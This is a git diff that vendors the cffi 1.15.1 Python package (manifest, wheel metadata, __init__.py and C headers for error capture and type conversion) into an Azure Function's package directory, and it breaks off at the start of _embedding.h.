+cffi-1.15.1.dist-info/entry_points.txt,sha256=y6jTxnyeuLnL-XJcDv8uML3n6wyYiGRg8MTp_QGJ9Ho,75 +cffi-1.15.1.dist-info/top_level.txt,sha256=rE7WR3rZfNKxWI9-jn6hsHCAl7MDkB-FmuQbxWjFehQ,19 +cffi/__init__.py,sha256=6xB_tafGvhhM5Xvj0Ova3oPC2SEhVlLTEObVLnazeiM,513 +cffi/__pycache__/__init__.cpython-39.pyc,, +cffi/__pycache__/api.cpython-39.pyc,, +cffi/__pycache__/backend_ctypes.cpython-39.pyc,, +cffi/__pycache__/cffi_opcode.cpython-39.pyc,, +cffi/__pycache__/commontypes.cpython-39.pyc,, +cffi/__pycache__/cparser.cpython-39.pyc,, +cffi/__pycache__/error.cpython-39.pyc,, +cffi/__pycache__/ffiplatform.cpython-39.pyc,, +cffi/__pycache__/lock.cpython-39.pyc,, +cffi/__pycache__/model.cpython-39.pyc,, +cffi/__pycache__/pkgconfig.cpython-39.pyc,, +cffi/__pycache__/recompiler.cpython-39.pyc,, +cffi/__pycache__/setuptools_ext.cpython-39.pyc,, +cffi/__pycache__/vengine_cpy.cpython-39.pyc,, +cffi/__pycache__/vengine_gen.cpython-39.pyc,, +cffi/__pycache__/verifier.cpython-39.pyc,, +cffi/_cffi_errors.h,sha256=zQXt7uR_m8gUW-fI2hJg0KoSkJFwXv8RGUkEDZ177dQ,3908 +cffi/_cffi_include.h,sha256=tKnA1rdSoPHp23FnDL1mDGwFo-Uj6fXfA6vA6kcoEUc,14800 +cffi/_embedding.h,sha256=9tnjF44QRobR8z0FGqAmAZY-wMSBOae1SUPqHccowqc,17680 +cffi/api.py,sha256=yxJalIePbr1mz_WxAHokSwyP5CVYde44m-nolHnbJNo,42064 +cffi/backend_ctypes.py,sha256=h5ZIzLc6BFVXnGyc9xPqZWUS7qGy7yFSDqXe68Sa8z4,42454 +cffi/cffi_opcode.py,sha256=v9RdD_ovA8rCtqsC95Ivki5V667rAOhGgs3fb2q9xpM,5724 +cffi/commontypes.py,sha256=QS4uxCDI7JhtTyjh1hlnCA-gynmaszWxJaRRLGkJa1A,2689 +cffi/cparser.py,sha256=rO_1pELRw1gI1DE1m4gi2ik5JMfpxouAACLXpRPlVEA,44231 +cffi/error.py,sha256=v6xTiS4U0kvDcy4h_BDRo5v39ZQuj-IMRYLv5ETddZs,877 +cffi/ffiplatform.py,sha256=HMXqR8ks2wtdsNxGaWpQ_PyqIvtiuos_vf1qKCy-cwg,4046 +cffi/lock.py,sha256=l9TTdwMIMpi6jDkJGnQgE9cvTIR7CAntIJr8EGHt3pY,747 +cffi/model.py,sha256=_GH_UF1Rn9vC4AvmgJm6qj7RUXXG3eqKPc8bPxxyBKE,21768 +cffi/parse_c_type.h,sha256=OdwQfwM9ktq6vlCB43exFQmxDBtj2MBNdK8LYl15tjw,5976 +cffi/pkgconfig.py,sha256=LP1w7vmWvmKwyqLaU1Z243FOWGNQMrgMUZrvgFuOlco,4374 +cffi/recompiler.py,sha256=YgVYTh2CrXIobo-vMk7_K9mwAXdd_LqB4-IbYABQ488,64598 +cffi/setuptools_ext.py,sha256=RUR17N5f8gpiQBBlXL34P9FtOu1mhHIaAf3WJlg5S4I,8931 +cffi/vengine_cpy.py,sha256=YglN8YS-UaHEv2k2cxgotNWE87dHX20-68EyKoiKUYA,43320 +cffi/vengine_gen.py,sha256=5dX7s1DU6pTBOMI6oTVn_8Bnmru_lj932B6b4v29Hlg,26684 +cffi/verifier.py,sha256=ESwuXWXtXrKEagCKveLRDjFzLNCyaKdqAgAlKREcyhY,11253 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/WHEEL new file mode 100644 index 0000000..486a29a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: false +Tag: cp39-cp39-manylinux_2_17_x86_64 +Tag: cp39-cp39-manylinux2014_x86_64 + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/entry_points.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/entry_points.txt new file mode 100644 index 0000000..987748d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/entry_points.txt @@ -0,0 +1,2 @@ +[distutils.setup_keywords] +cffi_modules = cffi.setuptools_ext:cffi_modules diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/top_level.txt new file mode 100644 index 0000000..fde771f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/top_level.txt @@ -0,0 +1,2 @@ +_cffi_backend +cffi diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__init__.py new file mode 100644 index 0000000..b955537 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__init__.py @@ -0,0 +1,14 @@ +__all__ = ['FFI', 'VerificationError', 'VerificationMissing', 'CDefError', + 'FFIError'] + +from .api import FFI +from .error import CDefError, FFIError, VerificationError, VerificationMissing +from .error import PkgConfigError + +__version__ = "1.15.1" +__version_info__ = (1, 15, 1) + +# The verifier module file names are based on the CRC32 of a string that +# contains the following version number. It may be older than __version__ +# if nothing is clearly incompatible. +__version_verifier_modules__ = "0.8.6" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..93e92e7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/api.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/api.cpython-39.pyc new file mode 100644 index 0000000..798c3ee Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/api.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/backend_ctypes.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/backend_ctypes.cpython-39.pyc new file mode 100644 index 0000000..d31d15d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/backend_ctypes.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/cffi_opcode.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/cffi_opcode.cpython-39.pyc new file mode 100644 index 0000000..f95594e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/cffi_opcode.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/commontypes.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/commontypes.cpython-39.pyc new file mode 100644 index 0000000..6ff9cbe Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/commontypes.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/cparser.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/cparser.cpython-39.pyc new file mode 100644 index 0000000..0348783 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/cparser.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/error.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/error.cpython-39.pyc new file mode 100644 index 0000000..7f5b18b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/error.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/ffiplatform.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/ffiplatform.cpython-39.pyc new file mode 100644 index 0000000..3d30957 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/ffiplatform.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/lock.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/lock.cpython-39.pyc new file mode 100644 index 0000000..52a8164 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/lock.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/model.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/model.cpython-39.pyc new file mode 100644 index 0000000..1910df7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/model.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/pkgconfig.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/pkgconfig.cpython-39.pyc new file mode 100644 index 0000000..5b00aec Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/pkgconfig.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/recompiler.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/recompiler.cpython-39.pyc new file mode 100644 index 0000000..73abb68 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/recompiler.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/setuptools_ext.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/setuptools_ext.cpython-39.pyc new file mode 100644 index 0000000..6d0b07a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/setuptools_ext.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/vengine_cpy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/vengine_cpy.cpython-39.pyc new file mode 100644 index 0000000..102a5a2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/vengine_cpy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/vengine_gen.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/vengine_gen.cpython-39.pyc new file mode 100644 index 0000000..8c95ae4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/vengine_gen.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/verifier.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/verifier.cpython-39.pyc new file mode 100644 index 0000000..c96497f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/__pycache__/verifier.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_cffi_errors.h b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_cffi_errors.h new file mode 100644 index 0000000..d9f7ad9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_cffi_errors.h @@ -0,0 +1,149 @@ +#ifndef CFFI_MESSAGEBOX +# ifdef _MSC_VER +# define CFFI_MESSAGEBOX 1 +# else +# define CFFI_MESSAGEBOX 0 +# endif +#endif + + +#if CFFI_MESSAGEBOX +/* Windows only: logic to take the Python-CFFI embedding logic + initialization errors and display them in a background thread + with MessageBox. The idea is that if the whole program closes + as a result of this problem, then likely it is already a console + program and you can read the stderr output in the console too. + If it is not a console program, then it will likely show its own + dialog to complain, or generally not abruptly close, and for this + case the background thread should stay alive. +*/ +static void *volatile _cffi_bootstrap_text; + +static PyObject *_cffi_start_error_capture(void) +{ + PyObject *result = NULL; + PyObject *x, *m, *bi; + + if (InterlockedCompareExchangePointer(&_cffi_bootstrap_text, + (void *)1, NULL) != NULL) + return (PyObject *)1; + + m = PyImport_AddModule("_cffi_error_capture"); + if (m == NULL) + goto error; + + result = PyModule_GetDict(m); + if (result == NULL) + goto error; + +#if PY_MAJOR_VERSION >= 3 + bi = PyImport_ImportModule("builtins"); +#else + bi = PyImport_ImportModule("__builtin__"); +#endif + if (bi == NULL) + goto error; + PyDict_SetItemString(result, "__builtins__", bi); + Py_DECREF(bi); + + x = PyRun_String( + "import sys\n" + "class FileLike:\n" + " def write(self, x):\n" + " try:\n" + " of.write(x)\n" + " except: pass\n" + " self.buf += x\n" + " def flush(self):\n" + " pass\n" + "fl = FileLike()\n" + "fl.buf = ''\n" + "of = sys.stderr\n" + "sys.stderr = fl\n" + "def done():\n" + " sys.stderr = of\n" + " return fl.buf\n", /* make sure the returned value stays alive */ + Py_file_input, + result, result); + Py_XDECREF(x); + + error: + if (PyErr_Occurred()) + { + PyErr_WriteUnraisable(Py_None); + PyErr_Clear(); + } + return result; +} + +#pragma comment(lib, "user32.lib") + +static DWORD WINAPI _cffi_bootstrap_dialog(LPVOID ignored) +{ + Sleep(666); /* may be interrupted if the whole process is closing */ +#if PY_MAJOR_VERSION >= 3 + MessageBoxW(NULL, (wchar_t *)_cffi_bootstrap_text, + L"Python-CFFI error", + MB_OK | MB_ICONERROR); +#else + MessageBoxA(NULL, (char *)_cffi_bootstrap_text, + "Python-CFFI error", + MB_OK | MB_ICONERROR); +#endif + _cffi_bootstrap_text = NULL; + return 0; +} + +static void _cffi_stop_error_capture(PyObject *ecap) +{ + PyObject *s; + void *text; + + if (ecap == (PyObject *)1) + return; + + if (ecap == NULL) + goto error; + + s = PyRun_String("done()", Py_eval_input, ecap, ecap); + if (s == NULL) + goto error; + + /* Show a dialog box, but in a background thread, and + never show multiple dialog boxes at once. */ +#if PY_MAJOR_VERSION >= 3 + text = PyUnicode_AsWideCharString(s, NULL); +#else + text = PyString_AsString(s); +#endif + + _cffi_bootstrap_text = text; + + if (text != NULL) + { + HANDLE h; + h = CreateThread(NULL, 0, _cffi_bootstrap_dialog, + NULL, 0, NULL); + if (h != NULL) + CloseHandle(h); + } + /* decref the string, but it should stay alive as 'fl.buf' + in the small module above. It will really be freed only if + we later get another similar error. So it's a leak of at + most one copy of the small module. That's fine for this + situation which is usually a "fatal error" anyway. */ + Py_DECREF(s); + PyErr_Clear(); + return; + + error: + _cffi_bootstrap_text = NULL; + PyErr_Clear(); +} + +#else + +static PyObject *_cffi_start_error_capture(void) { return NULL; } +static void _cffi_stop_error_capture(PyObject *ecap) { } + +#endif diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_cffi_include.h b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_cffi_include.h new file mode 100644 index 0000000..e0033e5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_cffi_include.h @@ -0,0 +1,385 @@ +#define _CFFI_ + +/* We try to define Py_LIMITED_API before including Python.h. + + Mess: we can only define it if Py_DEBUG, Py_TRACE_REFS and + Py_REF_DEBUG are not defined. This is a best-effort approximation: + we can learn about Py_DEBUG from pyconfig.h, but it is unclear if + the same works for the other two macros. Py_DEBUG implies them, + but not the other way around. + + The implementation is messy (issue #350): on Windows, with _MSC_VER, + we have to define Py_LIMITED_API even before including pyconfig.h. + In that case, we guess what pyconfig.h will do to the macros above, + and check our guess after the #include. + + Note that on Windows, with CPython 3.x, you need >= 3.5 and virtualenv + version >= 16.0.0. With older versions of either, you don't get a + copy of PYTHON3.DLL in the virtualenv. We can't check the version of + CPython *before* we even include pyconfig.h. ffi.set_source() puts + a ``#define _CFFI_NO_LIMITED_API'' at the start of this file if it is + running on Windows < 3.5, as an attempt at fixing it, but that's + arguably wrong because it may not be the target version of Python. + Still better than nothing I guess. As another workaround, you can + remove the definition of Py_LIMITED_API here. + + See also 'py_limited_api' in cffi/setuptools_ext.py. +*/ +#if !defined(_CFFI_USE_EMBEDDING) && !defined(Py_LIMITED_API) +# ifdef _MSC_VER +# if !defined(_DEBUG) && !defined(Py_DEBUG) && !defined(Py_TRACE_REFS) && !defined(Py_REF_DEBUG) && !defined(_CFFI_NO_LIMITED_API) +# define Py_LIMITED_API +# endif +# include + /* sanity-check: Py_LIMITED_API will cause crashes if any of these + are also defined. Normally, the Python file PC/pyconfig.h does not + cause any of these to be defined, with the exception that _DEBUG + causes Py_DEBUG. Double-check that. */ +# ifdef Py_LIMITED_API +# if defined(Py_DEBUG) +# error "pyconfig.h unexpectedly defines Py_DEBUG, but Py_LIMITED_API is set" +# endif +# if defined(Py_TRACE_REFS) +# error "pyconfig.h unexpectedly defines Py_TRACE_REFS, but Py_LIMITED_API is set" +# endif +# if defined(Py_REF_DEBUG) +# error "pyconfig.h unexpectedly defines Py_REF_DEBUG, but Py_LIMITED_API is set" +# endif +# endif +# else +# include +# if !defined(Py_DEBUG) && !defined(Py_TRACE_REFS) && !defined(Py_REF_DEBUG) && !defined(_CFFI_NO_LIMITED_API) +# define Py_LIMITED_API +# endif +# endif +#endif + +#include +#ifdef __cplusplus +extern "C" { +#endif +#include +#include "parse_c_type.h" + +/* this block of #ifs should be kept exactly identical between + c/_cffi_backend.c, cffi/vengine_cpy.py, cffi/vengine_gen.py + and cffi/_cffi_include.h */ +#if defined(_MSC_VER) +# include /* for alloca() */ +# if _MSC_VER < 1600 /* MSVC < 2010 */ + typedef __int8 int8_t; + typedef __int16 int16_t; + typedef __int32 int32_t; + typedef __int64 int64_t; + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + typedef unsigned __int64 uint64_t; + typedef __int8 int_least8_t; + typedef __int16 int_least16_t; + typedef __int32 int_least32_t; + typedef __int64 int_least64_t; + typedef unsigned __int8 uint_least8_t; + typedef unsigned __int16 uint_least16_t; + typedef unsigned __int32 uint_least32_t; + typedef unsigned __int64 uint_least64_t; + typedef __int8 int_fast8_t; + typedef __int16 int_fast16_t; + typedef __int32 int_fast32_t; + typedef __int64 int_fast64_t; + typedef unsigned __int8 uint_fast8_t; + typedef unsigned __int16 uint_fast16_t; + typedef unsigned __int32 uint_fast32_t; + typedef unsigned __int64 uint_fast64_t; + typedef __int64 intmax_t; + typedef unsigned __int64 uintmax_t; +# else +# include +# endif +# if _MSC_VER < 1800 /* MSVC < 2013 */ +# ifndef __cplusplus + typedef unsigned char _Bool; +# endif +# endif +#else +# include +# if (defined (__SVR4) && defined (__sun)) || defined(_AIX) || defined(__hpux) +# include +# endif +#endif + +#ifdef __GNUC__ +# define _CFFI_UNUSED_FN __attribute__((unused)) +#else +# define _CFFI_UNUSED_FN /* nothing */ +#endif + +#ifdef __cplusplus +# ifndef _Bool + typedef bool _Bool; /* semi-hackish: C++ has no _Bool; bool is builtin */ +# endif +#endif + +/********** CPython-specific section **********/ +#ifndef PYPY_VERSION + + +#if PY_MAJOR_VERSION >= 3 +# define PyInt_FromLong PyLong_FromLong +#endif + +#define _cffi_from_c_double PyFloat_FromDouble +#define _cffi_from_c_float PyFloat_FromDouble +#define _cffi_from_c_long PyInt_FromLong +#define _cffi_from_c_ulong PyLong_FromUnsignedLong +#define _cffi_from_c_longlong PyLong_FromLongLong +#define _cffi_from_c_ulonglong PyLong_FromUnsignedLongLong +#define _cffi_from_c__Bool PyBool_FromLong + +#define _cffi_to_c_double PyFloat_AsDouble +#define _cffi_to_c_float PyFloat_AsDouble + +#define _cffi_from_c_int(x, type) \ + (((type)-1) > 0 ? /* unsigned */ \ + (sizeof(type) < sizeof(long) ? \ + PyInt_FromLong((long)x) : \ + sizeof(type) == sizeof(long) ? \ + PyLong_FromUnsignedLong((unsigned long)x) : \ + PyLong_FromUnsignedLongLong((unsigned long long)x)) : \ + (sizeof(type) <= sizeof(long) ? \ + PyInt_FromLong((long)x) : \ + PyLong_FromLongLong((long long)x))) + +#define _cffi_to_c_int(o, type) \ + ((type)( \ + sizeof(type) == 1 ? (((type)-1) > 0 ? (type)_cffi_to_c_u8(o) \ + : (type)_cffi_to_c_i8(o)) : \ + sizeof(type) == 2 ? (((type)-1) > 0 ? (type)_cffi_to_c_u16(o) \ + : (type)_cffi_to_c_i16(o)) : \ + sizeof(type) == 4 ? (((type)-1) > 0 ? (type)_cffi_to_c_u32(o) \ + : (type)_cffi_to_c_i32(o)) : \ + sizeof(type) == 8 ? (((type)-1) > 0 ? (type)_cffi_to_c_u64(o) \ + : (type)_cffi_to_c_i64(o)) : \ + (Py_FatalError("unsupported size for type " #type), (type)0))) + +#define _cffi_to_c_i8 \ + ((int(*)(PyObject *))_cffi_exports[1]) +#define _cffi_to_c_u8 \ + ((int(*)(PyObject *))_cffi_exports[2]) +#define _cffi_to_c_i16 \ + ((int(*)(PyObject *))_cffi_exports[3]) +#define _cffi_to_c_u16 \ + ((int(*)(PyObject *))_cffi_exports[4]) +#define _cffi_to_c_i32 \ + ((int(*)(PyObject *))_cffi_exports[5]) +#define _cffi_to_c_u32 \ + ((unsigned int(*)(PyObject *))_cffi_exports[6]) +#define _cffi_to_c_i64 \ + ((long long(*)(PyObject *))_cffi_exports[7]) +#define _cffi_to_c_u64 \ + ((unsigned long long(*)(PyObject *))_cffi_exports[8]) +#define _cffi_to_c_char \ + ((int(*)(PyObject *))_cffi_exports[9]) +#define _cffi_from_c_pointer \ + ((PyObject *(*)(char *, struct _cffi_ctypedescr *))_cffi_exports[10]) +#define _cffi_to_c_pointer \ + ((char *(*)(PyObject *, struct _cffi_ctypedescr *))_cffi_exports[11]) +#define _cffi_get_struct_layout \ + not used any more +#define _cffi_restore_errno \ + ((void(*)(void))_cffi_exports[13]) +#define _cffi_save_errno \ + ((void(*)(void))_cffi_exports[14]) +#define _cffi_from_c_char \ + ((PyObject *(*)(char))_cffi_exports[15]) +#define _cffi_from_c_deref \ + ((PyObject *(*)(char *, struct _cffi_ctypedescr *))_cffi_exports[16]) +#define _cffi_to_c \ + ((int(*)(char *, struct _cffi_ctypedescr *, PyObject *))_cffi_exports[17]) +#define _cffi_from_c_struct \ + ((PyObject *(*)(char *, struct _cffi_ctypedescr *))_cffi_exports[18]) +#define _cffi_to_c_wchar_t \ + ((_cffi_wchar_t(*)(PyObject *))_cffi_exports[19]) +#define _cffi_from_c_wchar_t \ + ((PyObject *(*)(_cffi_wchar_t))_cffi_exports[20]) +#define _cffi_to_c_long_double \ + ((long double(*)(PyObject *))_cffi_exports[21]) +#define _cffi_to_c__Bool \ + ((_Bool(*)(PyObject *))_cffi_exports[22]) +#define _cffi_prepare_pointer_call_argument \ + ((Py_ssize_t(*)(struct _cffi_ctypedescr *, \ + PyObject *, char **))_cffi_exports[23]) +#define _cffi_convert_array_from_object \ + ((int(*)(char *, struct _cffi_ctypedescr *, PyObject *))_cffi_exports[24]) +#define _CFFI_CPIDX 25 +#define _cffi_call_python \ + ((void(*)(struct _cffi_externpy_s *, char *))_cffi_exports[_CFFI_CPIDX]) +#define _cffi_to_c_wchar3216_t \ + ((int(*)(PyObject *))_cffi_exports[26]) +#define _cffi_from_c_wchar3216_t \ + ((PyObject *(*)(int))_cffi_exports[27]) +#define _CFFI_NUM_EXPORTS 28 + +struct _cffi_ctypedescr; + +static void *_cffi_exports[_CFFI_NUM_EXPORTS]; + +#define _cffi_type(index) ( \ + assert((((uintptr_t)_cffi_types[index]) & 1) == 0), \ + (struct _cffi_ctypedescr *)_cffi_types[index]) + +static PyObject *_cffi_init(const char *module_name, Py_ssize_t version, + const struct _cffi_type_context_s *ctx) +{ + PyObject *module, *o_arg, *new_module; + void *raw[] = { + (void *)module_name, + (void *)version, + (void *)_cffi_exports, + (void *)ctx, + }; + + module = PyImport_ImportModule("_cffi_backend"); + if (module == NULL) + goto failure; + + o_arg = PyLong_FromVoidPtr((void *)raw); + if (o_arg == NULL) + goto failure; + + new_module = PyObject_CallMethod( + module, (char *)"_init_cffi_1_0_external_module", (char *)"O", o_arg); + + Py_DECREF(o_arg); + Py_DECREF(module); + return new_module; + + failure: + Py_XDECREF(module); + return NULL; +} + + +#ifdef HAVE_WCHAR_H +typedef wchar_t _cffi_wchar_t; +#else +typedef uint16_t _cffi_wchar_t; /* same random pick as _cffi_backend.c */ +#endif + +_CFFI_UNUSED_FN static uint16_t _cffi_to_c_char16_t(PyObject *o) +{ + if (sizeof(_cffi_wchar_t) == 2) + return (uint16_t)_cffi_to_c_wchar_t(o); + else + return (uint16_t)_cffi_to_c_wchar3216_t(o); +} + +_CFFI_UNUSED_FN static PyObject *_cffi_from_c_char16_t(uint16_t x) +{ + if (sizeof(_cffi_wchar_t) == 2) + return _cffi_from_c_wchar_t((_cffi_wchar_t)x); + else + return _cffi_from_c_wchar3216_t((int)x); +} + +_CFFI_UNUSED_FN static int _cffi_to_c_char32_t(PyObject *o) +{ + if (sizeof(_cffi_wchar_t) == 4) + return (int)_cffi_to_c_wchar_t(o); + else + return (int)_cffi_to_c_wchar3216_t(o); +} + +_CFFI_UNUSED_FN static PyObject *_cffi_from_c_char32_t(unsigned int x) +{ + if (sizeof(_cffi_wchar_t) == 4) + return _cffi_from_c_wchar_t((_cffi_wchar_t)x); + else + return _cffi_from_c_wchar3216_t((int)x); +} + +union _cffi_union_alignment_u { + unsigned char m_char; + unsigned short m_short; + unsigned int m_int; + unsigned long m_long; + unsigned long long m_longlong; + float m_float; + double m_double; + long double m_longdouble; +}; + +struct _cffi_freeme_s { + struct _cffi_freeme_s *next; + union _cffi_union_alignment_u alignment; +}; + +_CFFI_UNUSED_FN static int +_cffi_convert_array_argument(struct _cffi_ctypedescr *ctptr, PyObject *arg, + char **output_data, Py_ssize_t datasize, + struct _cffi_freeme_s **freeme) +{ + char *p; + if (datasize < 0) + return -1; + + p = *output_data; + if (p == NULL) { + struct _cffi_freeme_s *fp = (struct _cffi_freeme_s *)PyObject_Malloc( + offsetof(struct _cffi_freeme_s, alignment) + (size_t)datasize); + if (fp == NULL) + return -1; + fp->next = *freeme; + *freeme = fp; + p = *output_data = (char *)&fp->alignment; + } + memset((void *)p, 0, (size_t)datasize); + return _cffi_convert_array_from_object(p, ctptr, arg); +} + +_CFFI_UNUSED_FN static void +_cffi_free_array_arguments(struct _cffi_freeme_s *freeme) +{ + do { + void *p = (void *)freeme; + freeme = freeme->next; + PyObject_Free(p); + } while (freeme != NULL); +} + +/********** end CPython-specific section **********/ +#else +_CFFI_UNUSED_FN +static void (*_cffi_call_python_org)(struct _cffi_externpy_s *, char *); +# define _cffi_call_python _cffi_call_python_org +#endif + + +#define _cffi_array_len(array) (sizeof(array) / sizeof((array)[0])) + +#define _cffi_prim_int(size, sign) \ + ((size) == 1 ? ((sign) ? _CFFI_PRIM_INT8 : _CFFI_PRIM_UINT8) : \ + (size) == 2 ? ((sign) ? _CFFI_PRIM_INT16 : _CFFI_PRIM_UINT16) : \ + (size) == 4 ? ((sign) ? _CFFI_PRIM_INT32 : _CFFI_PRIM_UINT32) : \ + (size) == 8 ? ((sign) ? _CFFI_PRIM_INT64 : _CFFI_PRIM_UINT64) : \ + _CFFI__UNKNOWN_PRIM) + +#define _cffi_prim_float(size) \ + ((size) == sizeof(float) ? _CFFI_PRIM_FLOAT : \ + (size) == sizeof(double) ? _CFFI_PRIM_DOUBLE : \ + (size) == sizeof(long double) ? _CFFI__UNKNOWN_LONG_DOUBLE : \ + _CFFI__UNKNOWN_FLOAT_PRIM) + +#define _cffi_check_int(got, got_nonpos, expected) \ + ((got_nonpos) == (expected <= 0) && \ + (got) == (unsigned long long)expected) + +#ifdef MS_WIN32 +# define _cffi_stdcall __stdcall +#else +# define _cffi_stdcall /* nothing */ +#endif + +#ifdef __cplusplus +} +#endif diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_embedding.h b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_embedding.h new file mode 100644 index 0000000..6238f72 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/_embedding.h @@ -0,0 +1,528 @@ + +/***** Support code for embedding *****/ + +#ifdef __cplusplus +extern "C" { +#endif + + +#if defined(_WIN32) +# define CFFI_DLLEXPORT __declspec(dllexport) +#elif 